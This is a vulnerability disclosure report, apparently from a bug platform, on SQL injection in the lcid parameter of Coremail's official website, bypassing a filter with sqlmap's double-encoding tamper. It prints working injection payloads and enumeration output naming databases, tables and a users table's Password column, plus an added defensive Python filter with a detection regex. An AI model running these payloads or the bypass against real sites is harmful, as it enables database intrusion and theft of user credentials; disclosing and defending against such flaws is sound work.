### Brief description:
The Coremail official website has a SQL injection. There is a protection layer in place, but it can be bypassed.
### Details:
Vulnerable URL: http://www.coremail.cn/gjzc2/list_117.aspx?lcid=412
### Proof of vulnerability:
There is protection in place; running sqlmap with the tamper script chardoubleencode.py is enough to get results.
These are the payloads sqlmap used:
```text
Place: GET
Parameter: lcid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lcid=412) AND 4972=4972 AND (7728=7728
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lcid=412) AND 8722=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (8722=8722) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113))) AND (9712=9712
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: lcid=412) UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+CHAR(107)+CHAR(116)+CHAR(65)+CHAR(115)+CHAR(111)+CHAR(66)+CHAR(77)+CHAR(112)+CHAR(118)+CHAR(77)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: lcid=412) AND 6450=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (8683=8683
```
---
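The bypass above works because the protection layer matched its signatures against a once-decoded value while the application decoded the parameter a second time, so a double-percent-encoded payload (what sqlmap's chardoubleencode tamper produces) passed the filter and still reached the query intact. The following is an added defender-side example, not code from the report or from Coremail: it decodes each query parameter until the value stops changing before applying signatures, and independently enforces an allow-list on `lcid`, which the page only ever uses as a numeric id. The request lines, the signature set and the `LCID_PATTERN` allow-list are constructed assumptions for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample request targets (not taken from the site's logs). The second
# and third carry the first sqlmap payload above, percent-encoded once and twice;
# the fourth is a harmless parameter that happens to be double-encoded.
SAMPLE_REQUESTS = [
    "/gjzc2/list_117.aspx?lcid=412",
    "/gjzc2/list_117.aspx?lcid=412%29%20AND%204972%3D4972%20AND%20%287728%3D7728",
    "/gjzc2/list_117.aspx?lcid=412%2529%2520AND%25204972%253D4972%2520AND%2520%25287728%253D7728",
    "/gjzc2/list_117.aspx?lcid=412&kw=%25E6%2590%259C",
]

# Minimal signature set for illustration only; a production rule set is far larger.
SQLI_SIGNATURE = re.compile(
    r"\b(AND|OR)\b\s+\S+\s*=\s*\S+|\bUNION\b|\bSELECT\b|\bCONVERT\s*\(|sysusers",
    re.IGNORECASE,
)

# Allow-list for lcid (assumption: the page only uses it as a numeric id).
LCID_PATTERN = re.compile(r"^[0-9]{1,10}$")


def decode_until_stable(value, max_rounds=5):
    """Percent-decode repeatedly until the value stops changing.

    Returns (decoded_value, rounds). rounds >= 2 means the client sent a
    double-encoded value, which is exactly what chardoubleencode produces.
    """
    current = value
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return current, rounds


def split_query(path_query):
    """Split a request target into raw (still encoded) name/value pairs.

    urllib.parse.parse_qs is deliberately avoided because it decodes once,
    which would hide the number of encoding layers from decode_until_stable.
    """
    _, _, query = path_query.partition("?")
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, raw_value = pair.partition("=")
        params[name] = raw_value
    return params


def analyze_request(path_query):
    """Classify one request: decode fully, then apply the allow-list and signatures."""
    findings = {"lcid_valid": True, "double_encoded": False, "sqli_signature": False}
    for name, raw_value in split_query(path_query).items():
        decoded, rounds = decode_until_stable(raw_value)
        if rounds >= 2:
            findings["double_encoded"] = True
        if SQLI_SIGNATURE.search(decoded):
            findings["sqli_signature"] = True
        if name == "lcid" and not LCID_PATTERN.fullmatch(decoded):
            findings["lcid_valid"] = False
    # The allow-list decides on its own; the signature match is a second, weaker net.
    blocked = (not findings["lcid_valid"]) or findings["sqli_signature"]
    findings["verdict"] = "block" if blocked else "allow"
    return findings


if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(target, "->", analyze_request(target))
```

The allow-list check on `lcid` is the part that actually closes the hole: a numeric id never needs a parenthesis, a space or a keyword, so no amount of encoding tricks gets a payload through it, whereas the signature match only catches what the rule set happens to know. The fourth sample is flagged as double-encoded but still allowed, which is the right outcome for a log-and-review signal rather than a hard block. On the application side the equivalent fix is to bind `lcid` as a typed SqlParameter instead of concatenating it into the query text.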
Basic information obtained:
```text
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
```
Databases enumerated:
```text
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ysxx201412197372
```
The current database is naturally ysxx201412197372.
Tables:
```text
back-end DBMS: Microsoft SQL Server 2005
Database: ysxx201412197372
[93 tables]
+----------------------------+
| Whir_Cmn_Area |
| Whir_Cnt_Attached |
| Whir_Cnt_CreateLog |
| Whir_Cnt_Relation |
| Whir_Cnt_SubjectClass |
| Whir_Cnt_SubjectClass |
| Whir_Cnt_SubjectColumn |
| Whir_Cnt_WorkFlowLogs |
| Whir_Dev_Column |
| Whir_Dev_ConfigStrategy |
| Whir_Dev_Field |
| Whir_Dev_FormArea |
| Whir_Dev_FormArea |
| Whir_Dev_FormDate |
| Whir_Dev_FormOption |
| Whir_Dev_FormUpload |
| Whir_Dev_Menu |
| Whir_Dev_Model |
| Whir_Dev_Module |
| Whir_Dev_Plugin |
| Whir_Dev_SubmitForm |
| Whir_Ext_AuditActivity |
| Whir_Ext_Backup |
| Whir_Ext_CollectField |
| Whir_Ext_CollectField |
| Whir_Ext_Gather |
| Whir_Ext_GatherTable |
| Whir_Ext_OperateLog |
| Whir_Ext_SendEmailRecord |
| Whir_Ext_SensitiveWords |
| Whir_Ext_Tools |
| Whir_Ext_Upload |
| Whir_Ext_WorkFlow |
| Whir_Mem_MemberGroup |
| Whir_Mem_MemberGroup |
| Whir_Oa_NewsConfig |
| Whir_Oa_NewsTemp |
| Whir_Plu_AdvertPosition |
| Whir_Plu_AdvertPosition |
| Whir_Plu_SiteMap |
| Whir_Sec_Resources |
| Whir_Sec_RolesInResources |
| Whir_Sec_RolesInResources |
| Whir_Sec_Users |
| Whir_Sit_SiteInfo |
| Whir_U_Category_Bak |
| Whir_U_Category_Bak |
| Whir_U_Content_Bak |
| Whir_U_Content_Bak |
| Whir_U_Content_Category |
| Whir_U_Download_Bak |
| Whir_U_Download_Bak |
| Whir_U_Download_Category |
| Whir_U_Feedback_Bak |
| Whir_U_Feedback_Bak |
| Whir_U_Forms_Bak |
| Whir_U_Forms_Bak |
| Whir_U_Jobs_Bak |
| Whir_U_Jobs_Bak |
| Whir_U_Jobs_Category |
| Whir_U_Jobs_JobRequest |
| Whir_U_Links_Bak |
| Whir_U_Links_Bak |
| Whir_U_Magazine_Bak |
| Whir_U_Magazine_Bak |
| Whir_U_Magazine_Chapter |
| Whir_U_Magazine_Infor |
| Whir_U_Product_Bak |
| Whir_U_Product_Bak |
| Whir_U_Product_Category |
| Whir_U_SalesNet_Bak |
| Whir_U_SalesNet_Bak |
| Whir_U_SinglePage_Bak |
| Whir_U_SinglePage_Bak |
| Whir_U_SubContent_Bak |
| Whir_U_SubContent_Bak |
| Whir_U_SubContent_Category |
| Whir_U_SubForms_Bak |
| Whir_U_SubForms_Bak |
| Whir_U_SubPage_Bak |
| Whir_U_SubPage_Bak |
| Whir_U_SubProduct_Bak |
| Whir_U_SubProduct_Bak |
| Whir_U_SubProduct_Category |
| Whir_U_Survey_Answer |
| Whir_U_Survey_Answer |
| Whir_U_Survey_Bak |
| Whir_U_Survey_Detail |
| Whir_U_Survey_Question |
| Whir_U_Vote_Answer |
| Whir_U_Vote_Answer |
| Whir_U_Vote_Bak |
| Whir_U_Vote_Detail |
+----------------------------+
```
Below is the table Whir_Sec_Users:
```text
Table: Whir_Sec_Users
[19 columns]
+----------------+
| Column |
+----------------+
| CreateDate |
| CreateUser |
| Email |
| IsDel |
| LastLoginIP |
| LastLoginTime |
| LoginName |
| LoginType |
| Password |
| RealName |
| Remarks |
| RolesId |
| Sort |
| State |
| SystemLanguage |
| SystemSkin |
| UpdateDate |
| UpdateUser |
| UserId |
+----------------+
```
![8.jpg](https://images.seebug.org/upload/201504/2123174057d2cd3c9fe987c277d64a5b215c05d1.jpg)
The current user is sa, so cross-database queries are possible:
```text
Database: ReportServer
[27 tables]
+--------------------------+
| ActiveSubscriptions |
| Batch |
| CachePolicy |
| ChunkData |
| ConfigurationInfo |
| DataSource |
| Event |
| ExecutionLog |
| History |
| ModelDrill |
| ModelItemPolicy |
| ModelPerspective |
| Notifications |
| Policies |
| PolicyUserRole |
| ReportSchedule |
| Roles |
| RunningJobs |
| Schedule |
| SecData |
| ServerParametersInstance |
| SnapshotData |
| Subscriptions |
| UpgradeInfo |
| Users |
| Catalog |
| Keys |
+--------------------------+
```
The database could be dumped.... -_-
I didn't dump it,
didn't dump it,
dump....